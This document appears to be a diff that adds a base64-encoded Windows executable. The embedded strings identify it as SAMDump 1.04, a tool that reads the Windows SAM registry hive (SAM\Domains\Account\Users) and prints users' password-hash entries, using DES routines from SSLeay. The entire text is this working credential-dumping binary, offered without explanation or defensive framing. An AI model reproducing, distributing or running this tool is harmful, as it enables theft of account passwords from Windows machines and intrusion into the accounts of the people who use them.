+ABYAAAC4/////8PMzMzMzMzMUT0AEAAAjUwkCHIUgekAEAAALQAQAACFAT0AEAAAc+wryIvEhQGL +4YsIi0AEUMPMg+wIgz0I+0AAAFOLXCQQdRSD+0F8CIP7Wn8Dg8Mgi8Nbg8QIw4H7AAEAAH0wgz0c ++0AAAX4NagFT6ALA//+DxAjrD4sNYPtAADPAZosEWYPgAYXAdQeLw1uDxAjDis8z0orRoWD7QAD2 +RFABgHQUuAIAAACITCQIxkQkCgCIXCQJ6w64AQAAAIhcJAjGRCQJAI1MJARqAGoDixUI+0AAUVCN +RCQYUGgAAQAAUuif7///g8QchcB1B4vDW4PECMOD+AF1CzPAikQkBFuDxAjDM8AzyYpEJAWKTCQE +weAIWwvBg8QIw8zMzMzMzMzMzMzMVYvsV4t9CFfoIwAAAFpAUOhbgf//WgvAdAlXUOiPAAAAWlpf +ycPMzMzMzMzMzMzMi0wkBPfBAwAAAHQUigFBhMB0QPfBAwAAAHXxBQAAAACLAbr//v5+A9CD8P8z +woPBBKkAAQGBdOiLQfyEwHQyhOR0JKkAAP8AdBOpAAAA/3QC682NQf+LTCQEK8HDjUH+i0wkBCvB +w41B/YtMJAQrwcONQfyLTCQEK8HDzMzMzMxXi3wkCOtqLovALovALovAi0wkBFf3wQMAAAB0D4oB +QYTAdDv3wQMAAAB18YsBuv/+/n4D0IPw/zPCg8EEqQABAYF06ItB/ITAdCOE5HQaqQAA/wB0DqkA +AAD/dALrzY15/+sNjXn+6wiNef3rA415/ItMJAz3wQMAAAB0GYoRQYTSdGSIF0f3wQMAAAB17usF +iReDxwS6//7+fosBA9CD8P8zwosRg8EEqQABAYF04YTSdDSE9nQn98IAAP8AdBL3wgAAAP90AuvH +iReLRCQIX8NmiReLRCQIxkcCAF/DZokXi0QkCF/DiBeLRCQIX8P/JSwhQQDMzMzMzMzMzMzMVYvs +V1ZTi00QC8kPhNwAAACLdQiLfQyNBQD7QACDeAgAdUu3QbNatiAui8CKJgrkigd0IQrAdB1GRzj8 +cgY43HcCAuY4+HIGONh3AgLGOMR1DUl11zPJOMQPhI4AAAC5/////w+CgwAAAPfZ63+DPeQOQQAA +fwr/BegOQQBqAOsSi9lqE+iWkv//xwQkAQAAAIvLM8Az25CKBgvAih90IwvbdB9GR1FQU+iy/P// +i9iDxAToqPz//4PEBFk7w3UJSXXVM8k7w3QJuf////9yAvfZWAvAdQj/DegOQQDrDovZahPoqJL/ +/4PEBIvLi8FbXl/JwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQICBAQHBwgICwsNDQ4OEBATExUVFhYZGRoaHBwfHyAg +IyMlJSYmKSkqKiwsLy8xMTIyNDQ3Nzg4Ozs9PT4+QEBDQ0VFRkZJSUpKTExPT1FRUlJUVFdXWFhb +W11dXl5hYWJiZGRnZ2hoa2ttbW5ucHBzc3V1dnZ5eXp6fHx/f4CAg4OFhYaGiYmKioyMj4+RkZKS +lJSXl5iYm5udnZ6eoaGioqSkp6eoqKurra2urrCws7O1tba2ubm6ury8v7/BwcLCxMTHx8jIy8vN +zc7O0NDT09XV1tbZ2dra3Nzf3+Dg4+Pl5ebm6enq6uzs7+/x8fLy9PT39/j4+/v9/f7+AAAAABAA +AAAAAAAgEAAAIAAAAQAQAAEAAAABIBAAASAACAAAEAgAAAAIACAQCAAgAAgBABAIAQAACAEgEAgB +ICAAAAAwAAAAIAAAIDAAACAgAAEAMAABACAAASAwAAEgIAgAADAIAAAgCAAgMAgAICAIAQAwCAEA +IAgBIDAIASAAAAgAEAAIAAAACCAQAAggAAAJABAACQAAAAkgEAAJIAAICAAQCAgAAAgIIBAICCAA +CAkAEAgJAAAICSAQCAkgIAAIADAACAAgAAggMAAIICAACQAwAAkAIAAJIDAACSAgCAgAMAgIACAI +CCAwCAggIAgJADAICQAgCAkgMAgJIAAAAAAAAAACACAAAAAgAAIAACAAAAAgAgAgIAAAICACBAAA +AAQAAAIEIAAABCAAAgQAIAAEACACBCAgAAQgIAIABAAAAAQAAgAkAAAAJAACAAQgAAAEIAIAJCAA +ACQgAgQEAAAEBAACBCQAAAQkAAIEBCAABAQgAgQkIAAEJCACAAAAEAAAABIAIAAQACAAEgAAIBAA +ACASACAgEAAgIBIEAAAQBAAAEgQgABAEIAASBAAgEAQAIBIEICAQBCAgEgAEABAABAASACQAEAAk +ABIABCAQAAQgEgAkIBAAJCASBAQAEAQEABIEJAAQBCQAEgQEIBAEBCASBCQgEAQkIBIAAAAAAQAA +AAAABAABAAQAAAAAAQEAAAEAAAQBAQAEAQIAAAADAAAAAgAEAAMABAACAAABAwAAAQIABAEDAAQB +AAIAAAECAAAAAgQAAQIEAAACAAEBAgABAAIEAQECBAECAgAAAwIAAAICBAADAgQAAgIAAQMCAAEC +AgQBAwIEAQAAAAgBAAAIAAAECAEABAgAAAAJAQAACQAABAkBAAQJAgAACAMAAAgCAAQIAwAECAIA +AAkDAAAJAgAECQMABAkAAgAIAQIACAACBAgBAgQIAAIACQECAAkAAgQJAQIECQICAAgDAgAIAgIE +CAMCBAgCAgAJAwIACQICBAkDAgQJAAAAAAAAEAAAAQAAAAEQAAgAAAAIABAACAEAAAgBEAAAEAAA +ABAQAAARAAAAERAACBAAAAgQEAAIEQAACBEQAAAAAAQAABAEAAEABAABEAQIAAAECAAQBAgBAAQI +ARAEABAABAAQEAQAEQAEABEQBAgQAAQIEBAECBEABAgREAQAAAIAAAASAAABAgAAARIACAACAAgA +EgAIAQIACAESAAAQAgAAEBIAABECAAAREgAIEAIACBASAAgRAgAIERIAAAACBAAAEgQAAQIEAAES +BAgAAgQIABIECAECBAgBEgQAEAIEABASBAARAgQAERIECBACBAgQEgQIEQIECBESBAAAAAAAAAAQ +AAABAAAAARAEAAAABAAAEAQAAQAEAAEQAAAAIAAAADAAAAEgAAABMAQAACAEAAAwBAABIAQAATAA +ABAAAAAQEAAAEQAAABEQBAAQAAQAEBAEABEABAAREAAAECAAABAwAAARIAAAETAEABAgBAAQMAQA +ESAEABEwABAAAAAQABAAEAEAABABEAQQAAAEEAAQBBABAAQQARAAEAAgABAAMAAQASAAEAEwBBAA +IAQQADAEEAEgBBABMAAQEAAAEBAQABARAAAQERAEEBAABBAQEAQQEQAEEBEQABAQIAAQEDAAEBEg +ABARMAQQECAEEBAwBBARIAQQETAAAAAAAAAACAgAAAAIAAAIAAQAAAAEAAgIBAAACAQACAAAAgAA +AAIICAACAAgAAggABAIAAAQCCAgEAgAIBAIIAQAAAAEAAAgJAAAACQAACAEEAAABBAAICQQAAAkE +AAgBAAIAAQACCAkAAgAJAAIIAQQCAAEEAggJBAIACQQCCAAAAAIAAAAKCAAAAggAAAoABAACAAQA +CggEAAIIBAAKAAACAgAAAgoIAAICCAACCgAEAgIABAIKCAQCAggEAgoBAAACAQAACgkAAAIJAAAK +AQQAAgEEAAoJBAACCQQACgEAAgIBAAIKCQACAgkAAgoBBAICAQQCCgkEAgIJBAIKAAAAAAABAAAA +AAgAAAEIAAAAAAEAAQABAAAIAQABCAEQAAAAEAEAABAACAAQAQgAEAAAARABAAEQAAgBEAEIAQAA +IAAAASAAAAAoAAABKAAAACABAAEgAQAAKAEAASgBEAAgABABIAAQACgAEAEoABAAIAEQASABEAAo +ARABKAEAAgAAAAMAAAACCAAAAwgAAAIAAQADAAEAAggBAAMIARACAAAQAwAAEAIIABADCAAQAgAB +EAMAARACCAEQAwgBAAIgAAADIAAAAigAAAMoAAACIAEAAyABAAIoAQADKAEQAiAAEAMgABACKAAQ +AygAEAIgARADIAEQAigBEAMoAQAAAAAAAAAEAAAEAAAABAQCAAAAAgAABAIABAACAAQEACAAAAAg +AAQAIAQAACAEBAIgAAACIAAEAiAEAAIgBAQgAAAAIAAABCAABAAgAAQEIgAAACIAAAQiAAQAIgAE +BCAgAAAgIAAEICAEACAgBAQiIAAAIiAABCIgBAAiIAQEAAgAAAAIAAQACAQAAAgEBAIIAAACCAAE +AggEAAIIBAQAKAAAACgABAAoBAAAKAQEAigAAAIoAAQCKAQAAigEBCAIAAAgCAAEIAgEACAIBAQi +CAAAIggABCIIBAAiCAQEICgAACAoAAQgKAQAICgEBCIoAAAiKAAEIigEACIoBAQACAgCAAAIAAIA +AAICCAgCAAAAAgIICAACAAgAAgAAAgIICAAACAgCAAAIAgIIAAACCAACAAAAAgAAAAACAAgAAAAI +AAIAAAAACAACAAgIAAIICAIAAAgCAggAAAAIAAICAAAAAAgAAAAICAACAAgCAAgAAAIIAAICAAgC +AAAAAAAAAAACCAgCAAgAAgIACAAACAgCAAAIAAIIAAAACAACAgAIAgAIAAAACAgAAgAAAgIICAAC +AAAAAgAAAgAACAICCAgCAAgIAAAACAICCAACAAAAAgIIAAACAAgAAAAAAAAACAAAAAACAggAAgAI +CAICAAAAAgAIAgAIAAACCAgAEIAQQAAAAAAAgBAAAAAQQBAAAEAQgAAAAIAAQACAEAAAgAAAEAAQ +QBAAAAAAgABAEAAQAACAEEAAABBAEAAAAAAAEAAQgABAEAAQQACAAAAQgBAAAAAAQAAAAAAQABAA +EIAAQBCAEAAAgBBAEAAAQAAAAEAAABAAEIAAABCAEEAQABAAAIAQQACAAEAQgBAAEIAQQBAAEAAQ +AABAAAAAAAAAAEAQgAAAAAAQABAAEEAAgAAAAAAAQBCAEAAQgABAAIAQQACAAAAAAAAAEAAAQBAA +AAAQgBBAAIAQAAAAEEAQABBAAAAQABCAAAAAgABAEIAAQBAAAAAAABBAAIAQAAEAAAQAAQQEAAEA +AAEBAAQBAAQAAAAABAEBAAQAAQQAAAEABAAABAAAAAQEAQAAAAEBBAQBAQAAAQAAAAEABAQAAAAA +AQAEAAABBAQAAQAAAQEAAAEBBAQAAAQAAQAABAEABAQAAQAEAQEEAAAABAQAAQQAAAAAAAAAAAQB +AQQAAAEEBAABAAABAAAAAAAEAAEBAAABAAQAAAAEBAEBAAQAAAAAAAEEBAABBAABAAQEAQAEAAAA +AAQBAQQEAQAAAAEBBAABAAAEAAAABAEBBAQAAAQAAAEABAEBAAQAAQQAAAEABAAAAAABAAQEAQEA +AAEAAAQBAQQAAAEAAAAABAQIEEAAABAAEAgAAAAIEEAQAAAAAAAAQBAIEAAQCABAAAAQQBAIAAAQ +AAAAEAgQAAAIAAAQCBBAAAAAQAAAAAAQCABAEAAQQAAAEAAACAAAAAAQQAAIEAAQAABAEAAQAAAI +EAAAAAAAAAgAQAAAEEAQABAAEAgAQBAIEEAQAABAAAgAQBAIEAAAAABAAAgAABAAEEAAABAAEAgA +AAAAAEAQCBAAEAAAAAAAEAAACABAAAAAAAAIAEAQABBAEAAQAAAAAAAQCBBAEAgQQAAAAEAACBBA +EAgAAAAAEAAQCBBAAAgAQAAAEEAAAABAEAgQABAIEAAAAAAAEAgAABAAEEAQAAAACAAAAQAABAAA +IAQBCCAAAQgABAAIIAQBAAAAAQgAAAEAIAAAACAAAAgABAEAIAQACCAAAQgABAEIAAAAAAAEAQAA +AAAIIAABACAEAAAABAAIIAQBAAAAAAAgAAAIIAAAACAEAAggBAEIIAABAAAAAQgABAAAIAQAAAAE +AQgABAEIIAQACCAAAQAAAAEIAAABACAAAAAgAAAIAAQACAAAAAgABAEAIAQBCAAAAAAgBAEAAAAA +CAAEAAAgAAEAIAQACAAEAAAAAAAAIAQBCCAAAQgABAEIIAQAAAAAAQAABAEAIAABCAAEAAggBAAA +IAAAACAEAQAAAAEIIAAACEAAAIBAACAAAAAAAAAgIIBAACAAACAAAEAgAIAAACAAQCAAAEAgIIAA +ICAAAAAAgAAgAIBAAACAAAAggEAgIAAAACAAQCAAgEAAIIAAAAAAACAAAEAAAAAAICCAQAAggEAg +IIAAACCAAAAAgEAgAABAAAAAACAgAEAgIAAAIACAQCAAAAAAAIAAIACAQCAgAAAgIIBAACAAAAAA +AAAgAIAAAACAACAAAEAAIIAAACAAQAAgAEAgIIAAICAAQAAAAEAgIIAAICAAAAAgAEAgAIBAAACA +AAAggEAgIAAAAAAAACAAAEAAAIBAIACAACAggAAAIIBAIAAAQAAAAEAAIIAAQAAAAAIAAAACAAEE +AAABBEIAAQRAAAAAQgAAAAAAAAAAAAEEAgABBAIAAABAAAEEAAAAAEIAAQBAAAEEAgAABAIAAQBA +AAAEQAAABEIAAQAAAAAAAgABBAAAAQBCAAAEQAABBEIAAABCAAEEAAAABEIAAARAAAEAAgAAAAAA +AQRCAAAAQAABBEAAAQQCAAAAQAAAAAIAAAAAAAEEQAABBAIAAQRCAAAAQgAAAAAAAAACAAAEAAAB +BAAAAAACAAEAAAAABAIAAQACAAEAQgAABAIAAABAAAAEQgABAAAAAQBCAAEEAAAABEAAAARCAAEE +AAABAEIAAQBAAAEEQAAAgACAIAAAgiCAAAIAAAAAAAAAAiCAAIAAAACAIIAAgiCAAAAAAAAAIAAA +ggCAAAIAgACCAIAAAiCAAAAgAACAIAAAAgCAAIIAgACAAAAAAiCAAIIggAAAIAAAAAAAAIIAAAAA +IAAAgACAAAIggACAIAAAgAAAAAIAAACCIIAAAAAAAIAAAAACAIAAACCAAIIggAACAAAAACAAAAAA +AACCAIAAgCCAAAIgAAACIIAAgAAAAIIggAAAAIAAgAAAAAIggACCIAAAgAAAAIAggAAAIAAAggCA +AAIAgAACIAAAgCCAAAAAAACCIIAAggAAAAAAAAAAIIAAgCAAAAIAgACCAHDsQACwPUAAY3Nt4AEA +AAAAAAAAAAAAAAMAAAAgBZMZAAAAAAAAAAD/////4lJAAP1SQAAAAAAA//////5fQAALYEAAAAAA +AP////8AAAAA3WFAAAAAAAC2YUAAw2FAAP////85ZEAAP2RAAAAAAAD/////qmRAALJkQABMQ19U +SU1FAExDX05VTUVSSUMAAExDX01PTkVUQVJZAExDX0NUWVBFAAAAAExDX0NPTExBVEUAAExDX0FM +TAAALgAAACgAbgB1AGwAbAApAAAAAAAobnVsbCkAAAYAAAYAAQAAEAADBgAGAhAERUVFBQUFBQU1 +MABQAAAAACAoOFBYBwgANzAwV1AHAAAgIAgAAAAACGBgYGBgYAAAcHB4eHh4CAcIAAAHAAgICAAA +CAAIAAAIAAAAcnVudGltZSBlcnJvciAAAA0KAABUTE9TUyBlcnJvcg0KAAAAU0lORyBlcnJvcg0K +AAAAAERPTUFJTiBlcnJvcg0KAABSNjAyNw0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciBsb3dpbyBp +bml0aWFsaXphdGlvbg0KAAAAAFI2MDI2DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIHN0ZGlvIGlu +aXRpYWxpemF0aW9uDQoAAAAAUjYwMjUNCi0gcHVyZSB2aXJ0dWFsIGZ1bmN0aW9uIGNhbGwNCgAA +AFI2MDI0DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIF9vbmV4aXQvYXRleGl0IHRhYmxlDQoAAAAA +UjYwMTkNCi0gdW5hYmxlIHRvIG9wZW4gY29uc29sZSBkZXZpY2UNCgAAAABSNjAxOA0KLSB1bmV4 +cGVjdGVkIGhlYXAgZXJyb3INCgAAAABSNjAxNw0KLSB1bmV4cGVjdGVkIG11bHRpdGhyZWFkIGxv +Y2sgZXJyb3INCgAAAABSNjAxNg0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciB0aHJlYWQgZGF0YQ0K +AA0KYWJub3JtYWwgcHJvZ3JhbSB0ZXJtaW5hdGlvbg0KAAAAAFI2MDA5DQotIG5vdCBlbm91Z2gg +c3BhY2UgZm9yIGVudmlyb25tZW50DQoAUjYwMDgNCi0gbm90IGVub3VnaCBzcGFjZSBmb3IgYXJn +dW1lbnRzDQoAAABSNjAwMg0KLSBmbG9hdGluZyBwb2ludCBub3QgbG9hZGVkDQoAAAAATWljcm9z +b2Z0IFZpc3VhbCBDKysgUnVudGltZSBMaWJyYXJ5AAAAAAoKAABSdW50aW1lIEVycm9yIQoKUHJv +Z3JhbTogAAAALi4uADxwcm9ncmFtIG5hbWUgdW5rbm93bj4AAAAAAAD/////AAAAAIWOQAAAAAAA +WY5AAF+OQAD/////AAAAAP2OQAAAAAAA0Y5AANeOQAB1bml0ZWQtc3RhdGVzAAAAdW5pdGVkLWtp +bmdkb20AAHVuaXRlZCBzdGF0ZXMAAAB1bml0ZWQga2luZ2RvbQAAdHduAHR1cmtleQAAdHVyAHRh +aXdhbgAAc3dpdHplcmxhbmQAc3dlZGVuAABzd2UAc3ZrAHNwYWluAAAAc291dGgta29yZWEAc291 +dGgga29yZWEAc2dwAHNpbmdhcG9yZQAAAHJ1c3NpYQAAcHJ0AHByLWNoaW5hAAAAAHByIGNoaW5h +AAAAAHBvcnR1Z2FsAAAAAHBvbGFuZAAAcG9sAG56bABuegAAbm9yd2F5AABuZXctemVhbGFuZABu +ZXcgemVhbGFuZABuZXRoZXJsYW5kcwBtZXhpY28AAG1leABrb3JlYQAAAGphcGFuAAAAaXRhbHkA +AABpcmwAaXJlbGFuZABpY2VsYW5kAGh1bmdhcnkAaG9uZy1rb25nAAAAaG9uZyBrb25nAAAAaG9s +bGFuZABoa2cAZ3JlZWNlAABncmVhdCBicml0YWluAAAAZ3JjAGdlcm1hbnkAZ2JyAGZyYW5jZQAA +ZmlubGFuZABlbmdsYW5kAGRuawBkZW5tYXJrAGN6ZQBjaG4AY2hpbmEAAABjaGUAY2FuYWRhAABj +YW4AYnJpdGFpbgBicmF6aWwAAGJyYQBiZWxnaXVtAGJlbABhdXQAYXVzdHJpYQBhdXN0cmFsaWEA +AABhdXMAYW1lcmljYQB1c2EAdXMAAHVrAAB0dXJraXNoAHRyawBzd2lzcwAAAHN3ZWRpc2gAc3Zl +AHNwYW5pc2gtbW9kZXJuAABzcGFuaXNoLW1leGljYW4Ac3BhbmlzaABzbG92YWsAAHNreQBydXNz +aWFuAHJ1cwBwdGcAcHRiAHBvcnR1Z3Vlc2UtYnJhemlsaWFuAAAAAHBvcnR1Z3Vlc2UAAHBvbGlz +aAAAcGxrAG5vcndlZ2lhbi1ueW5vcnNrAAAAbm9yd2VnaWFuLWJva21hbAAAAABub3J3ZWdpYW4A +AABub3IAbm9uAG5sZABubGIAa29yZWFuAABrb3IAanBuAGphcGFuZXNlAAAAAGl0cwBpdGFsaWFu +LXN3aXNzAAAAaXRhbGlhbgBpdGEAaXNsAGlyaXNoLWVuZ2xpc2gAAABpY2VsYW5kaWMAAABodW5n +YXJpYW4AAABodW4AZ3JlZWsAAABnZXJtYW4tc3dpc3MAAAAAZ2VybWFuLWF1c3RyaWFuAGdlcm1h +bgAAZnJzAGZyZW5jaC1zd2lzcwAAAABmcmVuY2gtY2FuYWRpYW4AZnJlbmNoLWJlbGdpYW4AAGZy +ZW5jaAAAZnJjAGZyYgBmcmEAZmlubmlzaABmaW4AZXNwAGVzbgBlc20AZW56AGVudQBlbmkAZW5n +bGlzaC11c2EAZW5nbGlzaC11cwAAZW5nbGlzaC11awAAZW5nbGlzaC1uegAAZW5nbGlzaC1pcmUA +ZW5nbGlzaC1jYW4AZW5nbGlzaC1hdXMAZW5nbGlzaC1hbWVyaWNhbgAAAABlbmdsaXNoAGVuZwBl +bmMAZW5hAGVsbABkdXRjaC1iZWxnaWFuAAAAZHV0Y2gAAABkZXUAZGVzAGRlYQBkYW5pc2gAAGRh +bgBjemVjaAAAAGNzeQBjaHQAY2hzAGNoaW5lc2UtdHJhZGl0aW9uYWwAY2hpbmVzZS1zaW5nYXBv +cmUAAABjaGluZXNlLXNpbXBsaWZpZWQAAGNoaW5lc2UtaG9uZ2tvbmcAAAAAY2hpbmVzZQBjaGkA +Y2hoAGNhbmFkaWFuAAAAAGJlbGdpYW4AYXVzdHJhbGlhbgAAYW1lcmljYW4tZW5nbGlzaAAAAABh +bWVyaWNhbiBlbmdsaXNoAAAAAGFtZXJpY2FuAAAAAAAAAAAAAAAAAAAAAEdldExhc3RBY3RpdmVQ +b3B1cAAAR2V0QWN0aXZlV2luZG93AE1lc3NhZ2VCb3hBAHVzZXIzMi5kbGwAAEg6bW06c3MAZGRk +ZCwgTU1NTSBkZCwgeXl5eQBNL2QveXkAAFBNAABBTQAARGVjZW1iZXIAAAAATm92ZW1iZXIAAAAA +T2N0b2JlcgBTZXB0ZW1iZXIAAABBdWd1c3QAAEp1bHkAAAAASnVuZQAAAABBcHJpbAAAAE1hcmNo +AAAARmVicnVhcnkAAAAASmFudWFyeQBEZWMATm92AE9jdABTZXAAQXVnAEp1bABKdW4ATWF5AEFw +cgBNYXIARmViAEphbgBTYXR1cmRheQAAAABGcmlkYXkAAFRodXJzZGF5AAAAAFdlZG5lc2RheQAA +AFR1ZXNkYXkATW9uZGF5AABTdW5kYXkAAFNhdABGcmkAVGh1AFdlZABUdWUATW9uAFN1bgAAAAAA +U3VuTW9uVHVlV2VkVGh1RnJpU2F0AAAASmFuRmViTWFyQXByTWF5SnVuSnVsQXVnU2VwT2N0Tm92 +RGVjAAAAAAAAAAAAAAAAAAAAADj0QACI7EAAAAAAAAAAAAAAAAAAAQAAAJjsQACg7EAAAAAAADj0 +QAAAAAAAAAAAAP////8AAAAAAAAAAAEAAAA48EAAAAAAAP////8AAAAABAAAAAAAAAAAAAAAAQAA +ALjsQAAAAAAAAAAAAAAAAADY7EAAAQAAAEjwQAAAAAAA/////wAAAAAEAAAAAAAAAAAAAAABAAAA +8OxAAAAAAAAAAAAAAAAAABDtQAAgBZMZAgAAAEjtQAABAAAAWO1AAAAAAAAAAAAAAAAAAP////8A +AAAA/////wAAAAAAAAAAAAAAAAEAAAABAAAAcO1AAAAAAAAAAAAAAAAAAAAAAADhF0AAIAWTGQQA +AACg7UAAAQAAAMDtQAAAAAAAAAAAAAAAAAD/////AAAAAAAAAAC3IUAAAAAAAKohQAD/////AAAA +AAAAAAACAAAAAwAAAAEAAADY7UAAAAAAAAAAAAA48EAArP///8QhQAAgBZMZAwAAAAjuQAABAAAA +IO5AAAAAAAAAAAAAAAAAAP////8AAAAAAAAAAMgjQAD/////AAAAAAAAAAABAAAAAgAAAAEAAAA4 +7kAAAAAAAAAAAAA48EAA0P///9UjQAAgBZMZAwAAAGjuQAABAAAAgO5AAAAAAAAAAAAAAAAAAP// +//8AAAAAAAAAAHMlQAD/////AAAAAAAAAAABAAAAAgAAAAEAAACY7kAAAAAAAAAAAAA48EAAxP// +/4AlQAAgBZMZAwAAAMjuQAABAAAA4O5AAAAAAAAAAAAAAAAAAP////8AAAAAAAAAAGonQAD///// +AAAAAAAAAAABAAAAAgAAAAEAAAD47kAAAAAAAAAAAAA48EAAwP///3cnQAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAgVUAAAAAAAAAAAAAATEAAcI1AAAAAAAAAAAAA0ExAAAAAAAAAAAAAAAAAAAAA +AAAAAAAABOFAAAAAAAAuSgAAAAAAAAThQAAAAAAALkgAAFwAAAByYgAAAAAAAGNoZWNrX3ZwOiBt +YWxsb2MgZmFpbCBmb3IgaG9tZWRpci4KAGNoZWNrX3ZwOiBtYWxsb2MgZmFpbCBmb3IgY29tbWVu +dC4KAGNoZWNrX3ZwOiBtYWxsb2MgZmFpbCBmb3IgdXNlcm5hbWUuCgAAAAAlMDJYAAAAADoKAAAs +AAAAJXMAADoAAABOTyBQQVNTV09SRCoqKioqKioqKioqKioqKioqKioqKgAAAAAqKioqKioqKioq +KioqKioqKioqKioqKioqKioqKioqKgAAAAAlczolZDoAAEZhaWxlZCB0byBwYXJzZSBlbnRyeSBm +b3IgUklEICVYCgAAAHByaW50b3V0X3NtYl9lbnRyeTogVW5hYmxlIHRvIHJlYWQgdXNlciAnVicg +dmFsdWUuIEVycm9yIHdhcyAlcy4KLgAAcHJpbnRvdXRfc21iX2VudHJ5OiBtYWxsb2MgZmFpbCBm +b3IgdXNlciBlbnRyeS4KAAAAAHByaW50b3V0X3NtYl9lbnRyeTogVW5hYmxlIHRvIGRldGVybWlu +ZSBzaXplIG5lZWRlZCBmb3IgdXNlciAnVicgdmFsdWUuIEVycm9yIHdhcyAlcy4KLgBWAAAAZW51 +bWVyYXRlX3VzZXJzOiBGYWlsZWQgdG8gb3BlbiBrZXkgJXMgdG8gcmVhZCB2YWx1ZS4gRXJyb3Ig +d2FzICVzLgoAAAAAX1JlZ09wZW5LZXlFeCBlcnJvcjogJWQKAAAAAFNBTVxEb21haW5zXEFjY291 +bnRcVXNlcnMAAABfUmVnT3BlbkhpdmUgZXJyb3I6ICVkCgBVc2FnZToKICBTQU1EVU1QIDxTQU0g +ZmlsZSBuYW1lPgoAAABTQU1EdW1wIDEuMDQuIENyZWF0ZWQgYnkgRG1pdHJ5IEFuZHJpYW5vdgoA +AAAAAAAAAAAAAQEBAQEBAQH+/v7+/v7+/h8fHx8fHx8f4ODg4ODg4OAB/gH+Af4B/v4B/gH+Af4B +H+Af4A7xDvHgH+Af8Q7xDgHgAeAB8QHx4AHgAfEB8QEf/h/+Dv4O/v4f/h/+Dv4OAR8BHwEOAQ4f +AR8BDgEOAeD+4P7x/vH+/uD+4P7x/vEAAAAAAAAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAAA +AAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAAAAAAAREVTIHBhcnQgb2YgU1NMZWF5IDAuNi42IDE0 +LUphbi0xOTk3AAAAAGxpYmRlcyB2IDQuMDEgLSAxMy1KYW4tMTk5NyAtIGVheQAAAAj0QADg80AA +AQAAAAThQAAAAAAALj9BVnR5cGVfaW5mb0BAAFBVQAAAAAAAAQAAABYAAAACAAAAAgAAAAMAAAAC +AAAABAAAABgAAAAFAAAADQAAAAYAAAAJAAAABwAAAAwAAAAIAAAADAAAAAkAAAAMAAAACgAAAAcA +AAALAAAACAAAAAwAAAAWAAAADQAAABYAAAAPAAAAAgAAABAAAAANAAAAEQAAABIAAAASAAAAAgAA +ACEAAAANAAAANQAAAAIAAABBAAAADQAAAEMAAAACAAAAUAAAABEAAABSAAAADQAAAFMAAAANAAAA +VwAAABYAAABZAAAACwAAAGwAAAANAAAAbQAAACAAAABwAAAAHAAAAHIAAAAJAAAABgAAABYAAACA +AAAACgAAAIEAAAAKAAAAggAAAAkAAACDAAAAFgAAAIQAAAANAAAAkQAAACkAAACeAAAADQAAAKEA +AAACAAAApAAAAAsAAACnAAAADQAAALcAAAARAAAAzgAAAAIAAADXAAAACwAAABgHAAAMAAAAIAWT +GQAAAAAAAAAAAAAAABAPQQAAAAAAEA9BAAEBAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAA +AgAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAgtBAAAAAAAAAAAAAAAAAPgLQQAAAAAAAAAAAAAAAADIC0EAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAABQVUAA +AAAAAEMAAAAAAAAAtOFAAAAAAADwbUAAqOFAAJD5QABQq0AAnOFAAJD5QACgqEAAkOFAAJD5QACg +pUAAhOFAAJD5QAAwo0AAfOFAAJD5QADAm0AAAAAAAAAAAAAAAAAAAAAAAEMAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAABDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAEAAAAuAAAAAQAAAAAAAAAAAAAA0OFAAMDhQAD/////AAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAavtAAGr7QAAAACAAIAAgACAAIAAgACAAIAAgACgAKAAoACgAKAAgACAAIAAg +ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABIABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAA +EAAQAIQAhACEAIQAhACEAIQAhACEAIQAEAAQABAAEAAQABAAEACBAIEAgQCBAIEAgQABAAEAAQAB +AAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAEAAQABAAEAAQABAAggCCAIIAggCCAIIA +AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABAAEAAQABAAIAAAAAAAAAAA 